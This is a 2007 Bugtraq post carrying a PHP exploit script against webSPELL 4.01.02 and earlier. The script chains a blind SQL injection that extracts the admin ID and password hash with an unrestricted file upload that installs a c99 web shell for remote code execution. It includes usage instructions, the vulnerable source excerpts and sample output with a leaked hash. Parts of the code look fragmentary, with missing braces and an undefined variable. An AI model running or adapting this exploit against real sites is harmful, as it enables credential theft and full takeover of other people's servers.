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webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
- From: gmdarkfig@xxxxxxxxx
- Date: 3 Mar 2007 14:06:06 -0000
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
error_reporting(E_ALL ^ E_NOTICE);
# Admin id: 1
# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
if($argc < 5)
print ("
------ webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ------
PHP conditions: register_globals=On
Credits: DarkFig <gmdarkfig@xxxxxxxxx>
URL: http://www.acid-root.new.fr/
Usage: $argv[0] -url <> -file <> [Options]
Params: -url For example http://victim.com/webspell/
-file The file you wanna upload (c99shell.php...)
Options: -prefix Table prefix (default=webs)
-upmatch The match which returns TRUE for the upload
-sqlmatch The match which returns TRUE for the SQL injection
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
$url = getparam('url',1);
$file = getparam('file',1);
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'webs';
$match_upload = (getparam('upmatch')!='') ? getparam('upmatch') :
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') :
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth=$userid%3A$passwd)";
# File upload vulnerability
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no
access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
"fileurl" => 1,
"upfile" => array(frmdt_filename => basename($file),
frmdt_content => file_get_contents($file)));
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";
# Simple blind SQL injection (register_globals=On)
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER
BY sort");
function blind($field)
global $prfix,$xpl,$url,$match_blindsql;
$d=0; $v='';
if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9
else { $b=47;$c=70; } # 0-9a-z
if($e==47) $f='NULL';
else $f=$e;
$sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user
WHERE userID="
."(SELECT userID FROM ${prfix}_user_groups WHERE
files=1 LIMIT 1)"
." LIMIT 1),$d,1)=CHAR($f)";
return $v;
print strtolower(chr($f));
$v .= chr($f);
function getparam($param,$opt='')
global $argv;
foreach($argv as $value => $key)
if($key == '-'.$param) return $argv[$value+1];
if($opt) exit("\n-$param parameter required");
else return;
if(!function_exists('file_get_contents')) {
function file_get_contents($file)
$handle = fopen($file, "r");
$content = fread($fd, filesize($file));
return $content;